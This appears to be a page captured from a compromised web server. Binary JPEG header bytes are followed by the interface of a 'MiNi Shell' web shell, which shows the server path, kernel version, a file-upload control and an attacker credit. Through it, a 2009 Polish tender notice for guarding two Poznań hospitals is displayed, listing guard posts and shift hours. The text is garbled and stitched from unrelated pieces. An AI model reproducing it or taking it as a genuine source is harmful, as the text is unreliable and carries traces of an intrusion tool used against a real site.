JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/140078-N-2009.html

<p class="kh_header"><b>Poznań: Świadczenie usług w zakresie fizycznej ochrony mienia , osób i obiektów
ZAKLADU OPIEKI ZDROWOTNEJ POZNAŃ - STARE MIASTO:
Szpitala przy ul. Szkolnej 8/12 w Poznaniu
oraz
Szpitala przy ul. Szwajcarskiej 3 w Poznaniu</b><br>
<b>Numer ogłoszenia: 140078 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład  Opieki Zdrowotnej Poznań - Stare Miasto , ul. Szkolna 8/12, 61-833 Poznań, woj. wielkopolskie, faks 061 858-56-23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-strusia.poznan.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital-strusia.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie fizycznej ochrony mienia , osób i obiektów
ZAKLADU OPIEKI ZDROWOTNEJ POZNAŃ - STARE MIASTO:
Szpitala przy ul. Szkolnej 8/12 w Poznaniu
oraz
Szpitala przy ul. Szwajcarskiej 3 w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zapewnieniu bezpieczeństwa  
pracownikom i pacjentom przebywającym na terenach obiektów szpitalnych Zakładu Opieki Zdrowotnej Poznań - Stare Miasto, ochrony terenów i obiektów na nich położonych oraz odpowiedzialność za majątek ruchomy i nieruchomy znajdujący się w tych obiektach, przed kradzieżą, dewastacją, włamaniem, zniszczeniem oraz wszelkimi działaniami niepożądanymi zwłaszcza ze strony osób trzecich, we wszystkich obiektach oraz budynkach i pomieszczeniach technicznych w godzinach ustalonych i określonych w niniejszej specyfikacji.
Przedmiot zamówienia obejmuje świadczenie usług w zakresie ochrony 
następujących obiektów szpitalnych Zamawiającego:

A.	  SZPITAL  PRZY UL.SZKOLNEJ 8/12 w Poznaniu
          1/    SZPITAL , UL.SZKOLNA 8/12 w Poznaniu
	a. 1.	portiernia od ul.Szkolnej - obsada jednoosobowa całodobowa:
		posterunek ochrony w godz. od 16:00 do 06:00 zlokalizowany 
                          jest w Izbie Przyjęć Szpitala.
	a. 2.	portiernia od ul.Podgórnej - obsada dwuosobowa t.j.:
             	-jedna osoba - 07:00 - 13:00, od poniedziałku do piątku; w dni  
                          robocze,
                          -jedna osoba - obsada całodobowa
Dodatkowo jedna osoba patrolująca od zmroku do świtu w ramach kosztów obu powyższych portierni. W sezonie letnim od godziny 22:00 - 06:00, w sezonie zimowym od godziny 18:00 - 06:00.

	2/	ODDZIAŁ CHORÓB ZAKAŹNYCH, UL. WINCENTEGO 2
		-  obsada jednoosobowa całodobowa

	3/	ODDZIAŁ REUMATOLOGII, UL.WINOGRADY 144
		-  obsada jednoosobowa całodobowa

B.  SZPITAL  PRZY UL.SZWAJCARSKIEJ 3 w Poznaniu
1/POSTERUNEK  Nr  1   -	Portiernia  główna    pok.  22  blok  D  stały-  stacjonarny  całą  dobę  w  godzinach  7.oo  -  7.oo  tj. 24 godz.

2/POSTERUNEK  Nr  2   -	Portiernia  główna    pok.  22  blok  D  obchodowy
- obchodowy  całą  dobę  w  godzinach  7.oo  -  7.oo  tj. 24 godz.

3/ POSTERUNEK  Nr  3   -	Stanowisko  monitorowania  p. 22  blok  C-
- całą  dobę  w  godzinach  7.oo  -   7.oo  tj.  24  godziny

4/POSTERUNEK  Nr  4   -	Szpitalny  Oddział  Ratunkowy  - całą  dobę  w  godzinach  7.oo  -   7.oo  tj.  24  godziny

5/POSTERUNEK  Nr  5   -	Centrala  telefoniczna  pok.  22  blok  D 
- w  dni  wolne  od  pracy  8.oo  -  18.oo  tj. 10  godzin

6/POSTERUNEK  Nr  6   -	Portiernia  boczna  stały 
- stacjonarny, codziennie 18:00 - 06:00 tj. 12 godzin

7/POSTERUNEK  Nr  7   -	Portiernia boczna  obchodowy  tereny zewn. i 
SUW - obchodowy, codziennie 18:00 - 06:00 tj. 12 godzin.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przedmiotowym postepowaniu wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do postępowania zostaną dopuszczeni wykonawcy, którzy:
- spełniają warunki określone w art. 22 ust. 1 powołanej ustawy Prawo zamówień 
  publicznych,
- nie podlegają wykluczeniu z art. 24 ust. 1 i 2 tejże ustawy,
- posiadają aktualną koncesję na prowadzenie działalności gospodarczej w zakresie 
ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych. 
- przedłożą wykaz co najmniej dwóch rocznych umów  wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, usług odpowiadających swoim rodzajem i wartością  usługom stanowiącym przedmiot zamówienia , z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że usługi te zostały wykonane należycie.  
Brane 	będą pod uwagę  wyłącznie  usługi 	realizowane  w  szpitalach o liczbie łóżek nie mniej niż 200,  a dokumenty potwierdzające będą wystawione przez te szpitale, albo z treści tych dokumentów będzie  wynikać , że usługi realizowane były na rzecz szpitala . Nie będą brane pod uwagę potwierdzenia wystawione przez inne jednostki ochrony zdrowia, lub szpitale mniejsze niż 200-łóżkowe.
-posiadają pozwolenie na używanie częstotliwości radiowej na terenie miasta Poznania.
-dysponują w wyposażoną w środki przymusu bezpośredniego oraz łączności 
bezprzewodowej zewnętrznej i wewnętrznej potencjałem osobowym - grupą interwencyjną do wykonywania zadań i zapewnią w razie zagrożenia w czasie nie dłuższym niż 20 minut przybycie tejże grupy do wykonania zadań. 
- są ubezpieczeni od odpowiedzialności cywilnej na okres , na który zostanie zawarta umowa.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu  o  dokumenty oraz oświadczenia  i zaświadczenia dołączone do oferty pod warunkiem, że dokumenty te będą aktualne i kompletne. Nie złożenie dokumentów wymaganych w pkt. 4.2 siwz lub złożenie dokumentów w niewłaściwej formie (np. kopie niewłaściwie poświadczone za zgodność z oryginałem, brak  pieczątki  lub podpisu  osoby upoważnionej, nie złożenie dokumentów sporządzonych w językach obcych wraz z tłumaczeniem na język polski)  spowoduje wykluczenie wykonawcy  z postępowania (wówczas oferta zostanie uznana za odrzuconą), z zastrzeżeniem pkt. 4.4 siwz..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków określonych w pkt. 4.1 wykonawca winien dostarczyć następujące dokumenty:

1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.   Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie , że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert. 
3.Koncesję na wykonywanie usług (prowadzenie działalności gospodarczej) w 
   zakresie ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, 
gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach 
alarmowych, wydanej zgodnie z obowiązującymi przepisami.
4.Pozwolenie na używanie częstotliwości radiowej na terenie miasta Poznania - co najmniej jeden przydział częstotliwości z zezwoleniem na używanie urządzeń nadawczych lub nadawczo-odbiorczych pracujących w sieci radiokomunikacji na terenie miasta Poznania.
5.Oświadczenie o posiadaniu grupy interwencyjno - kontrolnej , która będzie współdziałać z zespołem chroniącym obiekty i zdolnej do wykonywania zadań w razie zagrożenia w czasie nie dłuższym niż 20 minut od momentu zgłoszenia
6.Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej z zakresie prowadzonej działalności w wysokości minimum 700.000,00 zł. 
7.Wykaz wykonanych umów (co najmniej dwie roczne umowy) w okresie 
ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadającej swoim rodzajem i zbliżoną wartością  usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Wykaz zrealizowanych usług należy złożyć wg wzoru stanowiącego załącznik do SIWZ. Do wykazu winny być dołączone dokumenty potwierdzające, że usługi te zostały wykonane należycie. W przypadku oferty podmiotów występujących wspólnie - warunek posiadania odpowiedniego doświadczenia winien spełniać przynajmniej jeden z podmiotów. Brane będą pod uwagę  wyłącznie  usługi 	realizowane  w  szpitalach o liczbie łóżek nie mniej niż 200,  a dokumenty potwierdzające będą wystawione przez te szpitale, albo z treści tych dokumentów będzie  wynikać , że usługi realizowane były na rzecz szpitala . Nie będą brane pod uwagę potwierdzenia wystawione przez inne jednostki ochrony zdrowia, lub szpitale mniejsze niż 200-łóżkowe.
8. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 i 2składa  dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a/     nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie
        wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b/     nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie         
        społeczne lub zdrowotne albo, że uzyskał  przewidziane prawem
        zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu, wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,
c/     nie orzeczono wobec niego zakazu ubiegania się o zamówienie, 	   
        wystawione nie wcześniej niż 6miesiące przed upływem terminu składania    
        ofert.
9.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym, w którym  
   wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  
   dokumentów, o których mowa w pkt.8,  zastępuje się je dokumentem 
   zawierającym oświadczenie złożone przed notariuszem, właściwym  
   organem sądowym, administracyjnym albo  organem samorządu  
   zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby,  
  lub kraju , w którym wykonawca  ma siedzibę lub miejsce zamieszkania, z  
  zachowaniem terminów, o których mowa w pkt.8.
10.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1  Prawa  zamówień publicznych.
11. Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1  i 2 Prawa zamówień publicznych.
12.   Do postępowania mogą przystąpić podmioty występujące wspólnie. W takim przypadku Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w tym postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. 
Jeśli oferta wykonawców występujących wspólnie zostanie wybrana, przed zawarciem umowy, wykonawcy ci przedłożą zamawiającemu umowę regulującą ich współpracę w zakresie realizacji niniejszego zamówienia.
13.  Wykaz podmiotów występujących wspólnie w niniejszym postępowaniu należy załączyć do oferty. Każdy z podmiotów występujących wspólnie zobowiązany jest spełnić warunki o których mowa w pkt. 4.1 siwz oraz przedłożyć dokumenty o których mowa w pkt.  1 - 11, z zastrzeżeniem pkt. 4.2.7. siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-strusia.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dokumnety  dostepne są bezposrednio na stronie www.szpital - strusia.poznan.pl lub w siedzibie zamawiającego: ul.Szwajcarska 3 Poznań , pok. 210 ( Dział Zam.Publ.) tel/fax: 061/8739-305..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 09:00, miejsce: wyłącznie do Kancelarii ZOZ Poznań - Stare Miasto, ul. Szwajcarska 3, pok. 239..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com